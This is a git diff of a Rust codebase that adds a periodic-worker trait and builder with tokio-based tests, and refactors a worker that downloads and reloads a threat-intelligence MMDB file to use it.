@@ -11,6 +16,331 @@ pub trait Worker: Send + Sync + 'static { fn run(&self, shutdown: watch::Receiver) -> JoinHandle<()>; } +// ============================================================================ +// PeriodicWorker - Simplified trait for interval-based workers +// ============================================================================ + +/// Result type for periodic task execution +pub type PeriodicResult = Result<(), Box>; + +/// Future type for async methods in PeriodicTask +pub type BoxFuture<'a, T> = Pin + Send + 'a>>; + +/// Trait for tasks that run periodically on a fixed interval. +/// +/// Implement this trait instead of `Worker` when you have a simple periodic task. +/// The boilerplate (interval setup, shutdown handling, logging) is handled automatically. +/// +/// # Example +/// ```ignore +/// struct MyPeriodicTask { +/// config: MyConfig, +/// } +/// +/// impl PeriodicTask for MyPeriodicTask { +/// fn name(&self) -> &str { "my_task" } +/// fn interval_secs(&self) -> u64 { 60 } +/// +/// fn execute(&self) -> BoxFuture<'_, PeriodicResult> { +/// Box::pin(async move { +/// // Do your periodic work here +/// Ok(()) +/// }) +/// } +/// } +/// +/// // Use with PeriodicWorker wrapper: +/// let worker = PeriodicWorker::new(MyPeriodicTask { config }); +/// manager.register_worker(config, worker); +/// ``` +pub trait PeriodicTask: Send + Sync + 'static { + /// Name of the task (used for logging) + fn name(&self) -> &str; + + /// Interval between executions in seconds + fn interval_secs(&self) -> u64; + + /// Execute the periodic task. Called on each interval tick. + fn execute(&self) -> BoxFuture<'_, PeriodicResult>; + + /// Called once when the worker starts, before the first interval tick. + /// Override this to perform initial setup or first-run logic. + /// Default implementation calls execute() for backward compatibility. + fn on_startup(&self) -> BoxFuture<'_, PeriodicResult> { + self.execute() + } + + /// Called when shutdown is requested, before the worker stops. + /// Override this to perform cleanup logic. + /// Default implementation does nothing. + fn on_shutdown(&self) -> BoxFuture<'_, ()> { + Box::pin(async {}) + } + + /// Whether to log each successful execution at debug level. + /// Set to false for high-frequency tasks to reduce log noise. + /// Default: true + fn log_success(&self) -> bool { + true + } + + /// Missed tick behavior. Default is Delay (postpone missed ticks). + fn missed_tick_behavior(&self) -> MissedTickBehavior { + MissedTickBehavior::Delay + } +} + +/// Wrapper that converts a PeriodicTask into a Worker. +/// Handles all the boilerplate: interval setup, shutdown handling, logging. +pub struct PeriodicWorker { + task: Arc, +} + +impl PeriodicWorker { + /// Create a new PeriodicWorker wrapping the given task + pub fn new(task: T) -> Self { + Self { + task: Arc::new(task), + } + } + + /// Create a PeriodicWorker from an Arc (useful for shared state) + pub fn from_arc(task: Arc) -> Self { + Self { task } + } +} + +impl Worker for PeriodicWorker { + fn name(&self) -> &str { + self.task.name() + } + + fn run(&self, mut shutdown: watch::Receiver) -> JoinHandle<()> { + let task = self.task.clone(); + let worker_name = task.name().to_string(); + let interval_secs = task.interval_secs(); + let log_success = task.log_success(); + let missed_tick_behavior = task.missed_tick_behavior(); + + tokio::spawn(async move { + log::info!( + "[{}] Starting periodic worker (interval: {}s)", + worker_name, + interval_secs + ); + + // Run startup logic + match task.on_startup().await { + Ok(()) => { + if log_success { + log::debug!("[{}] Startup completed successfully", worker_name); + } + } + Err(e) => { + log::warn!("[{}] Startup failed: {}", worker_name, e); + } + } + + // Set up periodic interval + let mut ticker = interval(Duration::from_secs(interval_secs)); + ticker.set_missed_tick_behavior(missed_tick_behavior); + + loop { + tokio::select! { + _ = shutdown.changed() => { + if *shutdown.borrow() { + log::info!("[{}] Shutdown signal received", worker_name); + task.on_shutdown().await; + log::info!("[{}] Periodic worker stopped", worker_name); + break; + } + } + _ = ticker.tick() => { + match task.execute().await { + Ok(()) => { + if log_success { + log::debug!("[{}] Periodic execution completed", worker_name); + } + } + Err(e) => { + log::warn!("[{}] Periodic execution failed: {}", worker_name, e); + } + } + } + } + } + }) + } +} + +// ============================================================================ +// PeriodicWorkerBuilder - Builder pattern for more complex configurations +// ============================================================================ + +/// Builder for creating PeriodicWorker with custom configurations. +/// +/// # Example +/// ```ignore +/// let worker = PeriodicWorkerBuilder::new("my_worker", 60) +/// .on_tick(|state| Box::pin(async move { +/// // Do work with state +/// Ok(()) +/// })) +/// .with_state(my_shared_state) +/// .build(); +/// ``` +pub struct PeriodicWorkerBuilder { + name: String, + interval_secs: u64, + state: S, + on_startup: Option BoxFuture<'_, PeriodicResult> + Send + Sync>>, + on_tick: Option BoxFuture<'_, PeriodicResult> + Send + Sync>>, + on_shutdown: Option BoxFuture<'_, ()> + Send + Sync>>, + log_success: bool, + missed_tick_behavior: MissedTickBehavior, +} + +impl PeriodicWorkerBuilder<()> { + /// Create a new builder with the given name and interval + pub fn new(name: impl Into, interval_secs: u64) -> Self { + Self { + name: name.into(), + interval_secs, + state: (), + on_startup: None, + on_tick: None, + on_shutdown: None, + log_success: true, + missed_tick_behavior: MissedTickBehavior::Delay, + } + } +} + +impl PeriodicWorkerBuilder { + /// Add state that will be passed to callbacks + pub fn with_state( + self, + state: S2, + ) -> PeriodicWorkerBuilder { + PeriodicWorkerBuilder { + name: self.name, + interval_secs: self.interval_secs, + state, + on_startup: None, + on_tick: None, + on_shutdown: None, + log_success: self.log_success, + missed_tick_behavior: self.missed_tick_behavior, + } + } + + /// Set the function to call on each interval tick + pub fn on_tick(mut self, f: F) -> Self + where + F: Fn(&S) -> BoxFuture<'_, PeriodicResult> + Send + Sync + 'static, + { + self.on_tick = Some(Box::new(f)); + self + } + + /// Set the function to call on startup (before first tick) + pub fn on_startup(mut self, f: F) -> Self + where + F: Fn(&S) -> BoxFuture<'_, PeriodicResult> + Send + Sync + 'static, + { + self.on_startup = Some(Box::new(f)); + self + } + + /// Set the function to call on shutdown + pub fn on_shutdown(mut self, f: F) -> Self + where + F: Fn(&S) -> BoxFuture<'_, ()> + Send + Sync + 'static, + { + self.on_shutdown = Some(Box::new(f)); + self + } + + /// Set whether to log successful executions (default: true) + pub fn log_success(mut self, log: bool) -> Self { + self.log_success = log; + self + } + + /// Set the missed tick behavior (default: Delay) + pub fn missed_tick_behavior(mut self, behavior: MissedTickBehavior) -> Self { + self.missed_tick_behavior = behavior; + self + } + + /// Build the PeriodicWorker + pub fn build(self) -> PeriodicWorker> { + let task = BuiltPeriodicTask { + name: self.name, + interval_secs: self.interval_secs, + state: self.state, + on_startup: self.on_startup, + on_tick: self + .on_tick + .expect("on_tick is required - call .on_tick() before .build()"), + on_shutdown: self.on_shutdown, + log_success: self.log_success, + missed_tick_behavior: self.missed_tick_behavior, + }; + PeriodicWorker::new(task) + } +} + +/// Internal task implementation for PeriodicWorkerBuilder +pub struct BuiltPeriodicTask { + name: String, + interval_secs: u64, + state: S, + on_startup: Option BoxFuture<'_, PeriodicResult> + Send + Sync>>, + on_tick: Box BoxFuture<'_, PeriodicResult> + Send + Sync>, + on_shutdown: Option BoxFuture<'_, ()> + Send + Sync>>, + log_success: bool, + missed_tick_behavior: MissedTickBehavior, +} + +impl PeriodicTask for BuiltPeriodicTask { + fn name(&self) -> &str { + &self.name + } + + fn interval_secs(&self) -> u64 { + self.interval_secs + } + + fn execute(&self) -> BoxFuture<'_, PeriodicResult> { + (self.on_tick)(&self.state) + } + + fn on_startup(&self) -> BoxFuture<'_, PeriodicResult> { + if let Some(ref f) = self.on_startup { + f(&self.state) + } else { + self.execute() + } + } + + fn on_shutdown(&self) -> BoxFuture<'_, ()> { + if let Some(ref f) = self.on_shutdown { + f(&self.state) + } else { + Box::pin(async {}) + } + } + + fn log_success(&self) -> bool { + self.log_success + } + + fn missed_tick_behavior(&self) -> MissedTickBehavior { + self.missed_tick_behavior + } +} + /// Worker configuration #[derive(Debug, Clone)] pub struct WorkerConfig { @@ -48,7 +378,10 @@ impl WorkerManager { worker: W, ) -> Result<(), String> { if !config.enabled { - log::info!("Worker '{}' is disabled, skipping registration", config.name); + log::info!( + "Worker '{}' is disabled, skipping registration", + config.name + ); return Ok(()); } @@ -79,7 +412,11 @@ impl WorkerManager { /// Wait for all workers to complete pub async fn wait_for_all(&mut self) { - let handles: Vec<_> = self.workers.drain().map(|(_, (_, handle))| handle).collect(); + let handles: Vec<_> = self + .workers + .drain() + .map(|(_, (_, handle))| handle) + .collect(); for handle in handles { if let Err(e) = handle.await { @@ -96,4 +433,3 @@ impl Default for WorkerManager { Self::new().0 } } - diff --git a/src/worker/mod.rs b/src/worker/mod.rs index 85def86..2f2ea61 100644 --- a/src/worker/mod.rs +++ b/src/worker/mod.rs @@ -1,3 +1,4 @@ +pub mod agent_status; pub mod certificate; pub mod config; pub mod geoip_mmdb; @@ -5,4 +6,17 @@ pub mod log; pub mod manager; pub mod threat_mmdb; -pub use manager::{Worker, WorkerConfig, WorkerManager}; +pub use manager::{ + BoxFuture, + PeriodicResult, + // PeriodicWorker exports + PeriodicTask, + PeriodicWorker, + PeriodicWorkerBuilder, + Worker, + WorkerConfig, + WorkerManager, +}; + +#[cfg(test)] +mod tests; diff --git a/src/worker/tests.rs b/src/worker/tests.rs new file mode 100644 index 0000000..4e27200 --- /dev/null +++ b/src/worker/tests.rs @@ -0,0 +1,491 @@ +use std::sync::Arc; +use std::sync::atomic::{AtomicU32, Ordering}; +use std::time::Duration; +use tokio::sync::watch; +use tokio::time::MissedTickBehavior; + +use super::manager::{ + BoxFuture, PeriodicResult, PeriodicTask, PeriodicWorker, PeriodicWorkerBuilder, Worker, + WorkerConfig, WorkerManager, +}; + +// ============================================================================ +// Test helpers +// ============================================================================ + +/// Simple counter task for testing +struct CounterTask { + name: String, + interval_secs: u64, + counter: Arc, + startup_counter: Arc, + shutdown_counter: Arc, +} + +impl CounterTask { + fn new(name: &str, interval_secs: u64) -> Self { + Self { + name: name.to_string(), + interval_secs, + counter: Arc::new(AtomicU32::new(0)), + startup_counter: Arc::new(AtomicU32::new(0)), + shutdown_counter: Arc::new(AtomicU32::new(0)), + } + } + + fn count(&self) -> u32 { + self.counter.load(Ordering::SeqCst) + } + + fn startup_count(&self) -> u32 { + self.startup_counter.load(Ordering::SeqCst) + } + + fn shutdown_count(&self) -> u32 { + self.shutdown_counter.load(Ordering::SeqCst) + } +} + +impl PeriodicTask for CounterTask { + fn name(&self) -> &str { + &self.name + } + + fn interval_secs(&self) -> u64 { + self.interval_secs + } + + fn execute(&self) -> BoxFuture<'_, PeriodicResult> { + let counter = self.counter.clone(); + Box::pin(async move { + counter.fetch_add(1, Ordering::SeqCst); + Ok(()) + }) + } + + fn on_startup(&self) -> BoxFuture<'_, PeriodicResult> { + let startup_counter = self.startup_counter.clone(); + Box::pin(async move { + startup_counter.fetch_add(1, Ordering::SeqCst); + Ok(()) + }) + } + + fn on_shutdown(&self) -> BoxFuture<'_, ()> { + let shutdown_counter = self.shutdown_counter.clone(); + Box::pin(async move { + shutdown_counter.fetch_add(1, Ordering::SeqCst); + }) + } +} + +/// Task that fails on execute +struct FailingTask { + name: String, + fail_count: Arc, +} + +impl FailingTask { + fn new(name: &str) -> Self { + Self { + name: name.to_string(), + fail_count: Arc::new(AtomicU32::new(0)), + } + } + + fn fail_count(&self) -> u32 { + self.fail_count.load(Ordering::SeqCst) + } +} + +impl PeriodicTask for FailingTask { + fn name(&self) -> &str { + &self.name + } + + fn interval_secs(&self) -> u64 { + 1 + } + + fn execute(&self) -> BoxFuture<'_, PeriodicResult> { + let fail_count = self.fail_count.clone(); + Box::pin(async move { + fail_count.fetch_add(1, Ordering::SeqCst); + Err("intentional failure".into()) + }) + } +} + +// ============================================================================ +// PeriodicTask trait tests +// ============================================================================ + +#[tokio::test] +async fn test_periodic_task_executes() { + let task = Arc::new(CounterTask::new("test_task", 1)); + let worker = PeriodicWorker::from_arc(task.clone()); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + // Wait for a few ticks (startup + 2 interval ticks) + tokio::time::sleep(Duration::from_millis(2500)).await; + + // Send shutdown + shutdown_tx.send(true).unwrap(); + handle.await.unwrap(); + + // Verify startup was called exactly once + assert_eq!(task.startup_count(), 1, "startup should be called once"); + + // Verify shutdown was called exactly once + assert_eq!(task.shutdown_count(), 1, "shutdown should be called once"); + + // Verify execute was called at least twice (interval ticks) + assert!( + task.count() >= 2, + "execute should be called at least twice, got {}", + task.count() + ); +} + +#[tokio::test] +async fn test_periodic_task_handles_failures() { + let task = Arc::new(FailingTask::new("failing_task")); + let worker = PeriodicWorker::from_arc(task.clone()); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + // Wait for a couple of ticks + tokio::time::sleep(Duration::from_millis(2500)).await; + + // Send shutdown + shutdown_tx.send(true).unwrap(); + handle.await.unwrap(); + + // Verify failures were recorded (task should have executed despite failures) + assert!( + task.fail_count() >= 2, + "task should have attempted execution despite failures" + ); +} + +#[tokio::test] +async fn test_periodic_task_shutdown() { + let task = Arc::new(CounterTask::new("shutdown_test", 10)); // Long interval + let worker = PeriodicWorker::from_arc(task.clone()); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + // Immediately send shutdown + tokio::time::sleep(Duration::from_millis(100)).await; + shutdown_tx.send(true).unwrap(); + + // Should complete quickly + let result = tokio::time::timeout(Duration::from_secs(1), handle).await; + assert!(result.is_ok(), "worker should shut down quickly"); + + // Shutdown callback should have been called + assert_eq!(task.shutdown_count(), 1, "shutdown should be called"); +} + +// ============================================================================ +// PeriodicWorkerBuilder tests +// ============================================================================ + +#[tokio::test] +async fn test_builder_basic() { + let counter = Arc::new(AtomicU32::new(0)); + let counter_clone = counter.clone(); + + let worker = PeriodicWorkerBuilder::new("builder_test", 1) + .on_tick(move |_| { + let c = counter_clone.clone(); + Box::pin(async move { + c.fetch_add(1, Ordering::SeqCst); + Ok(()) + }) + }) + .build(); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + // Wait for ticks + tokio::time::sleep(Duration::from_millis(2500)).await; + + shutdown_tx.send(true).unwrap(); + handle.await.unwrap(); + + assert!( + counter.load(Ordering::SeqCst) >= 2, + "should have ticked at least twice" + ); +} + +#[tokio::test] +async fn test_builder_with_state() { + #[derive(Clone)] + struct TestState { + multiplier: u32, + counter: Arc, + } + + let state = TestState { + multiplier: 5, + counter: Arc::new(AtomicU32::new(0)), + }; + let counter = state.counter.clone(); + + let worker = PeriodicWorkerBuilder::new("state_test", 1) + .with_state(state) + .on_tick(|s| { + let mult = s.multiplier; + let counter = s.counter.clone(); + Box::pin(async move { + counter.fetch_add(mult, Ordering::SeqCst); + Ok(()) + }) + }) + .build(); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + // Wait for ticks + tokio::time::sleep(Duration::from_millis(2500)).await; + + shutdown_tx.send(true).unwrap(); + handle.await.unwrap(); + + // Should have added multiplier (5) at least twice + assert!( + counter.load(Ordering::SeqCst) >= 10, + "should have added 5 at least twice" + ); +} + +#[tokio::test] +async fn test_builder_with_startup_and_shutdown() { + let startup_called = Arc::new(AtomicU32::new(0)); + let shutdown_called = Arc::new(AtomicU32::new(0)); + let tick_called = Arc::new(AtomicU32::new(0)); + + let startup_clone = startup_called.clone(); + let shutdown_clone = shutdown_called.clone(); + let tick_clone = tick_called.clone(); + + let worker = PeriodicWorkerBuilder::new("lifecycle_test", 1) + .on_startup(move |_| { + let s = startup_clone.clone(); + Box::pin(async move { + s.fetch_add(1, Ordering::SeqCst); + Ok(()) + }) + }) + .on_tick(move |_| { + let t = tick_clone.clone(); + Box::pin(async move { + t.fetch_add(1, Ordering::SeqCst); + Ok(()) + }) + }) + .on_shutdown(move |_| { + let s = shutdown_clone.clone(); + Box::pin(async move { + s.fetch_add(1, Ordering::SeqCst); + }) + }) + .build(); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + // Wait briefly + tokio::time::sleep(Duration::from_millis(1500)).await; + + shutdown_tx.send(true).unwrap(); + handle.await.unwrap(); + + assert_eq!( + startup_called.load(Ordering::SeqCst), + 1, + "startup should be called once" + ); + assert_eq!( + shutdown_called.load(Ordering::SeqCst), + 1, + "shutdown should be called once" + ); + assert!( + tick_called.load(Ordering::SeqCst) >= 1, + "tick should be called at least once" + ); +} + +#[tokio::test] +async fn test_builder_log_success_option() { + let counter = Arc::new(AtomicU32::new(0)); + let counter_clone = counter.clone(); + + // Test with log_success disabled (for high-frequency tasks) + let worker = PeriodicWorkerBuilder::new("no_log_test", 1) + .on_tick(move |_| { + let c = counter_clone.clone(); + Box::pin(async move { + c.fetch_add(1, Ordering::SeqCst); + Ok(()) + }) + }) + .log_success(false) + .build(); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + tokio::time::sleep(Duration::from_millis(1500)).await; + + shutdown_tx.send(true).unwrap(); + handle.await.unwrap(); + + assert!( + counter.load(Ordering::SeqCst) >= 1, + "task should still execute with logging disabled" + ); +} + +#[tokio::test] +async fn test_builder_missed_tick_behavior() { + let counter = Arc::new(AtomicU32::new(0)); + let counter_clone = counter.clone(); + + let worker = PeriodicWorkerBuilder::new("missed_tick_test", 1) + .on_tick(move |_| { + let c = counter_clone.clone(); + Box::pin(async move { + c.fetch_add(1, Ordering::SeqCst); + Ok(()) + }) + }) + .missed_tick_behavior(MissedTickBehavior::Skip) + .build(); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + tokio::time::sleep(Duration::from_millis(1500)).await; + + shutdown_tx.send(true).unwrap(); + handle.await.unwrap(); + + assert!( + counter.load(Ordering::SeqCst) >= 1, + "task should execute with Skip behavior" + ); +} + +// ============================================================================ +// WorkerManager integration tests +// ============================================================================ + +#[tokio::test] +async fn test_worker_manager_with_periodic_worker() { + let task = Arc::new(CounterTask::new("managed_task", 1)); + let worker = PeriodicWorker::from_arc(task.clone()); + + let (mut manager, _shutdown_rx) = WorkerManager::new(); + + let config = WorkerConfig { + name: "managed_task".to_string(), + interval_secs: 1, + enabled: true, + }; + + manager.register_worker(config, worker).unwrap(); + + // Let it run for a bit + tokio::time::sleep(Duration::from_millis(2500)).await; + + // Shutdown + manager.shutdown(); + manager.wait_for_all().await; + + // Verify the task executed + assert!( + task.count() >= 2, + "task should have executed at least twice" + ); + assert_eq!(task.shutdown_count(), 1, "shutdown should have been called"); +} + +#[tokio::test] +async fn test_worker_manager_disabled_worker() { + let task = Arc::new(CounterTask::new("disabled_task", 1)); + let worker = PeriodicWorker::from_arc(task.clone()); + + let (mut manager, _shutdown_rx) = WorkerManager::new(); + + let config = WorkerConfig { + name: "disabled_task".to_string(), + interval_secs: 1, + enabled: false, // Disabled! + }; + + manager.register_worker(config, worker).unwrap(); + + // Wait briefly + tokio::time::sleep(Duration::from_millis(500)).await; + + // Task should not have executed because worker is disabled + assert_eq!(task.count(), 0, "disabled task should not execute"); + assert_eq!( + task.startup_count(), + 0, + "disabled task startup should not be called" + ); +} + +#[tokio::test] +async fn test_multiple_periodic_workers() { + let task1 = Arc::new(CounterTask::new("task1", 1)); + let task2 = Arc::new(CounterTask::new("task2", 1)); + + let worker1 = PeriodicWorker::from_arc(task1.clone()); + let worker2 = PeriodicWorker::from_arc(task2.clone()); + + let (mut manager, _shutdown_rx) = WorkerManager::new(); + + manager + .register_worker( + WorkerConfig { + name: "task1".to_string(), + interval_secs: 1, + enabled: true, + }, + worker1, + ) + .unwrap(); + + manager + .register_worker( + WorkerConfig { + name: "task2".to_string(), + interval_secs: 1, + enabled: true, + }, + worker2, + ) + .unwrap(); + + // Let them run + tokio::time::sleep(Duration::from_millis(2500)).await; + + manager.shutdown(); + manager.wait_for_all().await; + + // Both tasks should have executed + assert!(task1.count() >= 2, "task1 should have executed"); + assert!(task2.count() >= 2, "task2 should have executed"); +} diff --git a/src/worker/threat_mmdb.rs b/src/worker/threat_mmdb.rs index 1110c1a..984bddb 100644 --- a/src/worker/threat_mmdb.rs +++ b/src/worker/threat_mmdb.rs @@ -1,16 +1,14 @@ use std::collections::HashMap; use std::path::PathBuf; +use std::sync::RwLock; use std::time::Duration; -use anyhow::{anyhow, Context, Result}; +use anyhow::{Context, Result, anyhow}; use serde::Deserialize; -use tokio::sync::watch; -use tokio::task::JoinHandle; -use tokio::time::{interval, Duration as TokioDuration, MissedTickBehavior}; -use crate::http_client::get_global_reqwest_client; -use crate::threat; -use crate::worker::Worker; +use crate::security::waf::threat; +use crate::utils::http_client::get_global_reqwest_client; +use crate::worker::{BoxFuture, PeriodicResult, PeriodicTask}; #[derive(Debug, Deserialize)] struct VersionResponse { @@ -22,17 +20,26 @@ struct VersionResponse { hash: String, } +/// Configuration for the Threat MMDB worker +#[derive(Clone)] +pub struct ThreatMmdbConfig { + pub mmdb_base_url: String, + pub mmdb_path: Option, + pub headers: Option>, +} + /// Periodically checks version.txt and downloads the latest Threat MMDB, /// then asks the threat module to reload it from disk. -pub struct ThreatMmdbWorker { +/// +/// Implements `PeriodicTask` for use with `PeriodicWorker`. +pub struct ThreatMmdbTask { interval_secs: u64, - mmdb_base_url: String, - mmdb_path: Option, - headers: Option>, - api_key: String, + config: ThreatMmdbConfig, + /// Tracks the current version across executions + current_version: RwLock>, } -impl ThreatMmdbWorker { +impl ThreatMmdbTask { pub fn new( interval_secs: u64, mmdb_base_url: String, @@ -40,103 +47,121 @@ impl ThreatMmdbWorker { headers: Option>, api_key: String, ) -> Self { + // Build headers with API key + let mut final_headers = headers.unwrap_or_default(); + if !api_key.is_empty() { + final_headers.insert("Authorization".to_string(), format!("Bearer {}", api_key)); + } + let headers = if final_headers.is_empty() { + None + } else { + Some(final_headers) + }; + Self { interval_secs, - mmdb_base_url, - mmdb_path, - headers, - api_key, + config: ThreatMmdbConfig { + mmdb_base_url, + mmdb_path, + headers, + }, + current_version: RwLock::new(None), + } + } + + /// Perform a sync operation and update the current version if changed + async fn do_sync(&self) -> PeriodicResult { + let current = self.current_version.read().unwrap().clone(); + + match sync_mmdb( + &self.config.mmdb_base_url, + self.config.mmdb_path.clone(), + current.clone(), + self.config.headers.clone(), + ) + .await + { + Ok(new_ver) => { + if new_ver != current { + if let Ok(mut guard) = self.current_version.write() { + *guard = new_ver.clone(); + } + if new_ver.is_some() { + log::info!("[threat_mmdb] MMDB updated to version {:?}", new_ver); + } + } + Ok(()) + } + Err(e) => Err(e.to_string().into()), } } } -impl Worker for ThreatMmdbWorker { +impl PeriodicTask for ThreatMmdbTask { fn name(&self) -> &str { "threat_mmdb" } - fn run(&self, mut shutdown: watch::Receiver) -> JoinHandle<()> { - let interval_secs = self.interval_secs; - let mmdb_base_url = self.mmdb_base_url.clone(); - let mmdb_path = self.mmdb_path.clone(); - let mut headers = self.headers.clone().unwrap_or_default(); - let api_key = self.api_key.clone(); + fn interval_secs(&self) -> u64 { + self.interval_secs + } - // Always add API key to headers if provided - if !api_key.is_empty() { - headers.insert("Authorization".to_string(), format!("Bearer {}", api_key)); - } + fn execute(&self) -> BoxFuture<'_, PeriodicResult> { + Box::pin(async move { self.do_sync().await }) + } - let headers = if headers.is_empty() { None } else { Some(headers) }; + fn on_startup(&self) -> BoxFuture<'_, PeriodicResult> { + // Same as execute - sync on startup + Box::pin(async move { self.do_sync().await }) + } - tokio::spawn(async move { - let worker_name = "threat_mmdb".to_string(); - let mut current_version: Option = None; + fn log_success(&self) -> bool { + false // We handle our own logging for version changes + } +} - log::info!( - "[{}] Starting Threat MMDB worker (interval: {}s)", - worker_name, - interval_secs - ); +// ============================================================================ +// Legacy Worker wrapper for backward compatibility +// ============================================================================ - // Initial sync on startup - match sync_mmdb( - &mmdb_base_url, - mmdb_path.clone(), - current_version.clone(), - headers.clone(), - ) - .await - { - Ok(new_ver) => { - current_version = new_ver; - } - Err(e) => { - log::warn!( - "[{}] Initial Threat MMDB sync failed: {}", - worker_name, - e - ); - } - } +use crate::worker::{PeriodicWorker, Worker}; +use tokio::sync::watch; +use tokio::task::JoinHandle; - let mut ticker = interval(TokioDuration::from_secs(interval_secs)); - ticker.set_missed_tick_behavior(MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = ticker.tick() => { - match sync_mmdb( - &mmdb_base_url, - mmdb_path.clone(), - current_version.clone(), - headers.clone(), - ).await { - Ok(new_ver) => { - if new_ver != current_version { - current_version = new_ver; - log::info!("[{}] Threat MMDB updated to latest version", worker_name); - } else { - log::debug!("[{}] Threat MMDB already at latest version", worker_name); - } - } - Err(e) => { - log::warn!("[{}] Periodic Threat MMDB sync failed: {}", worker_name, e); - } - } - } - _ = shutdown.changed() => { - if *shutdown.borrow() { - log::info!("[{}] Threat MMDB worker received shutdown signal", worker_name); - break; - } - } - } - } - }) +/// Legacy wrapper that creates a ThreatMmdbTask and wraps it in PeriodicWorker +pub struct ThreatMmdbWorker { + inner: PeriodicWorker, +} + +impl ThreatMmdbWorker { + pub fn new( + interval_secs: u64, + mmdb_base_url: String, + mmdb_path: Option, + headers: Option>, + api_key: String, + ) -> Self { + let task = ThreatMmdbTask::new(interval_secs, mmdb_base_url, mmdb_path, headers, api_key); + Self { + inner: PeriodicWorker::new(task), + } } } +impl Worker for ThreatMmdbWorker { + fn name(&self) -> &str { + self.inner.name() + } + + fn run(&self, shutdown: watch::Receiver) -> JoinHandle<()> { + self.inner.run(shutdown) + } +} + +// ============================================================================ +// Sync logic (unchanged) +// ============================================================================ + /// One sync pass: check version API, download a new MMDB if needed, write it /// to disk, and ask the threat module to reload it. async fn sync_mmdb( @@ -150,8 +175,7 @@ async fn sync_mmdb( let versions_url = format!("{}/indicators/version", base); // Check L1 cache first using pingora-memory-cache - let cache = threat::get_version_cache() - .context("Failed to get version cache")?; + let cache = threat::get_version_cache().context("Failed to get version cache")?; let cache_key = format!("threat_mmdb_version:{}", base); // Try to get cached version @@ -167,10 +191,12 @@ async fn sync_mmdb( req = req.header(key, value); } } - let resp = req - .send() - .await - .with_context(|| format!("Failed to download version from {} (timeout: 120s)", versions_url))?; + let resp = req.send().await.with_context(|| { + format!( + "Failed to download version from {} (timeout: 120s)", + versions_url + ) + })?; let status = resp.status(); if !status.is_success() { return Err(anyhow!( @@ -185,13 +211,18 @@ async fn sync_mmdb( .with_context(|| format!("Failed to parse version JSON from {}", versions_url))?; if !version_resp.success { - return Err(anyhow!("Version API returned success=false from {}", versions_url)); + return Err(anyhow!( + "Version API returned success=false from {}", + versions_url + )); } version_resp.version } else { // For file:// URLs, try to parse as JSON file - let file_path = versions_url.strip_prefix("file://").unwrap_or(&versions_url); + let file_path = versions_url + .strip_prefix("file://") + .unwrap_or(&versions_url); let content = tokio::fs::read_to_string(file_path) .await .with_context(|| format!("Failed to read version file from {}", file_path))?; @@ -199,7 +230,10 @@ async fn sync_mmdb( .with_context(|| format!("Failed to parse version JSON from {}", file_path))?; if !version_resp.success { - return Err(anyhow!("Version file returned success=false from {}", file_path)); + return Err(anyhow!( + "Version file returned success=false from {}", + file_path + )); } version_resp.version @@ -209,7 +243,10 @@ async fn sync_mmdb( if let Some(cached_ver) = cached_version { if cache_status.is_hit() && cached_ver == latest { // Version matches cache, skip download - log::debug!("Threat MMDB version {} matches cache, skipping download", latest); + log::debug!( + "Threat MMDB version {} matches cache, skipping download", + latest + ); return Ok(Some(latest)); } } @@ -222,7 +259,8 @@ async fn sync_mmdb( } } - let mut local_path = mmdb_path.ok_or_else(|| anyhow!("MMDB path not configured for Threat MMDB worker"))?; + let mut local_path = + mmdb_path.ok_or_else(|| anyhow!("MMDB path not configured for Threat MMDB worker"))?; // If the path doesn't have a file extension, treat it as a directory and append the filename if local_path.extension().is_none() { @@ -237,17 +275,14 @@ async fn sync_mmdb( // Strip file:// prefix if present let file_base = base.strip_prefix("file://").unwrap_or(base); let src_path = PathBuf::from(file_base).join(&latest); - tokio::fs::read(&src_path) - .await - .with_context(|| format!("Failed to read MMDB from {:?}", src_path))? + tokio::fs::read(&src_path).await.with_context(|| { + format!( + "Failed to copy MMDB from {:?} to {:?}", + src_path, local_path + ) + })? }; - if let Some(parent) = local_path.parent() { - tokio::fs::create_dir_all(parent) - .await - .with_context(|| format!("Failed to create MMDB directory {:?}", parent))?; - } - tokio::fs::write(&local_path, &bytes) .await .with_context(|| format!("Failed to write MMDB to {:?}", local_path))?; @@ -259,18 +294,16 @@ async fn sync_mmdb( log::debug!("Updated threat MMDB version cache: {}", latest); // Ask the threat module to reload from the updated path. - crate::threat::refresh_threat_mmdb().await?; + crate::security::waf::threat::refresh_threat_mmdb().await?; Ok(Some(latest)) } - +/// Download MMDB file into memory and return the bytes async fn download_mmdb(url: &str, headers: Option<&HashMap>) -> Result> { - let client = get_global_reqwest_client() - .context("Failed to get HTTP client for MMDB download")?; + let client = + get_global_reqwest_client().context("Failed to get HTTP client for MMDB download")?; - // Use a longer timeout for large files (120s base + 1s per MB) - // For 172MB file, that would be ~292s, but we'll use a fixed 600s (10min) for very large files let timeout_secs = 600; // 10 minutes for large MMDB files let mut req = client.get(url).timeout(Duration::from_secs(timeout_secs)); if let Some(hdrs) = headers { @@ -278,29 +311,22 @@ async fn download_mmdb(url: &str, headers: Option<&HashMap>) -> req = req.header(key, value); } } - let resp = req - .send() - .await - .with_context(|| format!("Failed to download MMDB from {} (timeout: 120s)", url))?; + let resp = req.send().await.with_context(|| { + format!( + "Failed to download MMDB from {} (timeout: {}s)", + url, timeout_secs + ) + })?; let status = resp.status(); - - // Get content length for logging (before consuming response) - let content_length = resp.content_length(); - if !status.is_success() { - // Try to read error body, but don't fail if we can't - let status_text = match resp.text().await { - Ok(text) if !text.is_empty() => text, - _ => format!("HTTP {}", status), - }; return Err(anyhow!( - "MMDB download failed: status {} from {} - {}", + "MMDB download failed: status {} from {}", status, - url, - status_text + url )); } + let content_length = resp.content_length(); let file_size_mb = content_length.map(|s| s as f64 / 1_048_576.0); log::info!( "Downloading MMDB from {} (content-length: {:?}, ~{:.2} MB, timeout: {}s)", @@ -310,24 +336,21 @@ async fn 